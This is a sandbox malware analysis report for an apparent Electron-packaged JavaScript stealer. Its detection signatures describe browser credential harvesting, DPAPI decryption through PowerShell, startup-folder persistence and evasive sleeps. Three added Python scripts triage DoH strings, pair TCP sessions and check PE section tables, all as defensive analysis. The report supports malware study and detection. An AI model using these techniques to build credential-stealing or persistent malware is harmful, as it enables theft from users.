Windows Analysis Report
SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe

Overview

General Information

Sample name: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe
Analysis ID: 1417301
MD5: b691aa17712dea8153bdcaa3ffbdaca4
SHA1: 6ae217a6063c7a2f8cf33a53ecac633d85f5ba36
SHA256: 6235029d8dda63ac594132df856a367093c80f5a432b1b5a7c29d5601aab5af4
Tags: exe

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FF846B64FEE CryptUnprotectData, 15_2_00007FF846B64FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B84FEE CryptUnprotectData, 18_2_00007FF846B84FEE
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\LICENSE.electron.txt
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View IP Address: 162.159.61.3
Source: Joe Sandbox View IP Address: 162.159.137.232
Source: Joe Sandbox View IP Address: 151.80.29.83
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
Source: powershell.exe, 0000000F.00000002.2436690487.0000014282D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B8992000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/161903006
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/166809097
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/184850002
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/187425444
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/220069903
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/229267970
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/250706693
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/253522366
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://myactivity.google.com/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://nextdns.io/privacy
Source: powershell.exe, 0000000F.00000002.2450786406.0000014291D55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2436690487.00000142835D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2450786406.0000014291C12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B96A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://odvr.nic.cz/doh
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: sw.pak.0.dr String found in binary or memory: https://passwords.google.comAkaunti
Source: fr.pak.0.dr String found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.dr String found in binary or memory: https://passwords.google.comGoogle
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://policies.google.com/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/IIJ
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: fr.pak.0.dr String found in binary or memory: https://support.google.com/chrome/a/?p=block_warn
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: zh-CN.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG
Source: sw.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.nic.cz/odvr/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/Quad9
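Reading the DoH strings above: the hosts (quad9, cleanbrowsing, cox, spectrum, xfinity, opendns, dns.sb, iij, nic.cz odvr, nextdns, alekberg, quickline, dns64.dns.google) and the privacy-policy URLs next to them are entries of the DoH provider table that Chromium compiles into its network stack, and Setup.exe is dropped together with ffmpeg.dll, libEGL.dll, libGLESv2.dll, vk_swiftshader.dll, vulkan-1.dll and *.pak locale files, the runtime files an Electron-packaged application ships. Where a line runs on past the endpoint path (a hostname and IP addresses after "dns-query" or "doh"), the tail is the provider's DoT hostname and resolver addresses stored next to the URL, not part of it. The strings are therefore expected in that image rather than evidence of a resolver the malware chose; the useful check is to pull the endpoints out cleanly and diff them against the known public resolvers so that anything else stands out. The script below is an added example, not part of the report or of the sample; its input is a constructed list modelled on the lines above, and the last entry (resolver.invalid) is invented to show what an unexpected endpoint looks like.

```python
import re

# Constructed input modelled on the "String found in binary or memory" lines
# above. Some entries run straight into the neighbouring table fields (DoT
# hostname, resolver IPs) exactly as the sandbox printed them. The final entry
# is invented for the demo and is not from the sample.
SAMPLE_STRINGS = [
    "https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10",
    "https://dns11.quad9.net/dns-query",
    "https://doh.cleanbrowsing.org/doh/family-filter",
    "https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30",
    "https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1",
    "https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn",
    "https://dns64.dns.google/dns-query",
    "https://resolver.invalid/dns-query",  # constructed: not a known public resolver
]

# Anchor the match on the DoH path instead of a generic URL regex, so the match
# ends where the endpoint ends rather than swallowing the fused trailing fields.
DOH_ENDPOINT = re.compile(
    r"https://([A-Za-z0-9.-]+)(/(?:dns-query|doh(?:/[A-Za-z0-9-]+)?))"
)

# Public DoH resolver hosts taken from the report lines above; all of them are
# entries of Chromium's built-in provider list. Extend from the Chromium source
# if you want the full table.
KNOWN_PUBLIC_DOH_HOSTS = {
    "dns10.quad9.net", "dns11.quad9.net", "dns64.dns.google", "dnsnl.alekberg.net",
    "doh-01.spectrum.com", "doh-02.spectrum.com", "doh.cleanbrowsing.org",
    "doh.cox.net", "doh.dns.sb", "doh.familyshield.opendns.com", "doh.opendns.com",
    "doh.quickline.ch", "doh.xfinity.com", "odvr.nic.cz", "public.dns.iij.jp",
}


def extract_doh_endpoints(strings):
    """Return sorted unique (host, path) pairs for every DoH endpoint found."""
    found = set()
    for s in strings:
        for m in DOH_ENDPOINT.finditer(s):
            found.add((m.group(1).lower(), m.group(2)))
    return sorted(found)


def triage_doh(strings):
    """Split endpoints into known public resolvers and hosts that need a look."""
    endpoints = extract_doh_endpoints(strings)
    known = [e for e in endpoints if e[0] in KNOWN_PUBLIC_DOH_HOSTS]
    unknown = [e for e in endpoints if e[0] not in KNOWN_PUBLIC_DOH_HOSTS]
    return {"known": known, "unknown": unknown}


if __name__ == "__main__":
    result = triage_doh(SAMPLE_STRINGS)
    for host, path in result["known"]:
        print(f"known public resolver  {host}{path}")
    for host, path in result["unknown"]:
        print(f"UNKNOWN DoH endpoint   {host}{path}")
```

On the constructed input the seven resolvers from the report land in "known" and only the invented host is reported; privacy-policy URLs and the truncated "https://chromium.dns.nextdn" are ignored because they carry no DoH path.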
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
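The 34 port lines above record each direction of each connection separately and carry no remote address, hostname or TLS server name, so the first useful step is to fold them into one record per client (ephemeral) port. The sandbox labels them "HTTP", but 443 is the HTTPS/TLS port, and nothing about payload or destination can be read from these lines. The script below is an added example, not part of the report; it embeds the report lines verbatim, pairs the two directions of every session, and reports any one-directional connection and any ephemeral port in the observed range that never appears with port 443. On these lines it finds 17 bidirectional sessions on TCP 443 from client ports 49719 to 49737, with 49730 and 49734 absent.

```python
import re
from collections import defaultdict

# The 34 "Network traffic detected" lines from the report, embedded so the
# script runs offline. Each line records one direction of one TCP connection.
REPORT_LINES = """\
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
""".splitlines()

LINE_RE = re.compile(r"traffic on port (\d+) -> (\d+)")
SERVICE_PORT = 443


def pair_sessions(lines):
    """Fold directional port lines into {client_port: [directions seen]}.

    The sandbox prints 'A -> B' once per direction it saw, so a complete TLS
    session appears twice: 'client -> 443' (outbound) and '443 -> client' (inbound).
    """
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        if dst == SERVICE_PORT:
            seen[src].add("outbound")
        elif src == SERVICE_PORT:
            seen[dst].add("inbound")
    return {port: sorted(dirs) for port, dirs in sorted(seen.items())}


def summarize(sessions):
    """Count complete sessions and flag one-way or missing client ports."""
    if not sessions:
        return {"sessions": 0, "bidirectional": 0, "one_way": [],
                "port_range": None, "unlisted_ports": []}
    bidir = [p for p, d in sessions.items() if d == ["inbound", "outbound"]]
    one_way = [p for p, d in sessions.items() if len(d) == 1]
    lo, hi = min(sessions), max(sessions)
    gaps = [p for p in range(lo, hi + 1) if p not in sessions]
    return {"sessions": len(sessions), "bidirectional": len(bidir),
            "one_way": one_way, "port_range": (lo, hi), "unlisted_ports": gaps}


if __name__ == "__main__":
    print(summarize(pair_sessions(REPORT_LINES)))
```

Client ports that appear in only one direction would indicate a connection the sandbox saw set up but never answered (or the reverse), which is worth checking against the PCAP; here there are none.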

System Summary

Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File dump: Setup.exe.0.dr 162027520 bytes (about 154.5 MiB) Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File dump: Setup.exe0.0.dr 162027520 bytes (about 154.5 MiB) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File dump: Setup.exe.3.dr 162027520 bytes (about 154.5 MiB) Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process token adjusted: Security Jump to behavior
Source: libEGL.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.dr Static PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: Setup.exe0.0.dr Static PE information: Number of sections : 16 > 10
Source: libEGL.dll0.0.dr Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll0.0.dr Static PE information: Number of sections : 11 > 10
Source: Setup.exe.3.dr Static PE information: Number of sections : 16 > 10
Source: ffmpeg.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: Setup.exe.0.dr Static PE information: Number of sections : 16 > 10
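The "Number of sections : N > 10" lines are a fixed-threshold heuristic on IMAGE_FILE_HEADER.NumberOfSections, and the summary's "sections with non-standard names" signature is the same section table checked against a list of expected names. Both are weak evidence for this sample on their own: the files flagged (ffmpeg.dll, libEGL.dll, libGLESv2.dll, vk_swiftshader.dll, vulkan-1.dll and Setup.exe) are the Chromium-based Electron runtime, and those builds commonly carry more than ten sections with toolchain-specific names. The script below is an added example, not from the report or the sample, that reads the COFF header and section table with struct and applies both checks. It runs on constructed header-only images built in the same file; the section names in them are chosen to resemble a Chromium-style build and a plain MSVC build and were not read from the dropped files.

```python
import struct

# Section names the usual MSVC/LLVM toolchains emit by default. Anything else is
# reported, which is the same notion the sandbox's "non-standard names" signature uses.
STANDARD_SECTION_NAMES = {
    ".text", ".rdata", ".data", ".pdata", ".idata", ".edata", ".rsrc",
    ".reloc", ".tls", ".bss", ".CRT", ".gfids", ".xdata", ".didat",
}
SECTION_COUNT_THRESHOLD = 10  # the report flags "Number of sections : N > 10"


def _pe_offset(data):
    """Locate the 'PE\\0\\0' signature via e_lfanew; raise on a non-PE blob."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    return e_lfanew


def is_pe(data):
    try:
        _pe_offset(data)
        return True
    except ValueError:
        return False


def section_headers(data):
    """Return [(name, virtual_address, raw_size)] from the section table."""
    coff = _pe_offset(data) + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    if len(data) < table + nsec * 40:
        raise ValueError("truncated section table")
    out = []
    for i in range(nsec):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, vaddr, rawsize, _rawptr = struct.unpack_from("<IIII", data, off + 8)
        out.append((name, vaddr, rawsize))
    return out


def triage_pe(data):
    """Apply the section-count and non-standard-name heuristics to one image."""
    secs = section_headers(data)
    names = [n for n, _, _ in secs]
    return {
        "section_count": len(secs),
        "too_many_sections": len(secs) > SECTION_COUNT_THRESHOLD,
        "nonstandard_names": [n for n in names if n not in STANDARD_SECTION_NAMES],
    }


def build_pe(section_names, pe32plus=True):
    """Constructed header-only PE image for the demo: parseable, not loadable."""
    opt_size = 240 if pe32plus else 224  # IMAGE_OPTIONAL_HEADER64 / 32
    e_lfanew = 0x80
    dos = bytearray(b"MZ") + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       len(section_names), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B) + b"\0" * (opt_size - 2)
    table = b""
    for i, name in enumerate(section_names):
        hdr = name.encode("ascii")[:8].ljust(8, b"\0")
        hdr += struct.pack("<IIII", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i)
        table += hdr + b"\0" * 16
    return bytes(dos) + b"PE\0\0" + coff + opt + table


# Constructed samples (not bytes from the dropped files).
ELECTRON_LIKE = build_pe([".text", ".rdata", ".data", ".pdata", ".00cfg", ".gxfg",
                          ".retplne", ".tls", ".voltbl", "_RDATA", "CPADinfo",
                          "malloc_h", ".rsrc", ".reloc", ".gfids", ".giats"])
PLAIN = build_pe([".text", ".rdata", ".data", ".rsrc", ".reloc"], pe32plus=False)

if __name__ == "__main__":
    for label, img in (("electron-like", ELECTRON_LIKE), ("plain", PLAIN)):
        print(label, triage_pe(img))
```

To run it on a real dropped file, pass `open(path, "rb").read()` to `triage_pe`; the threshold and the name list are the knobs to tune, and a hit should be weighed against what the file is known to be (here, a Chromium runtime) before it counts as evidence.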
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: iertutil.dll Jump to behavior
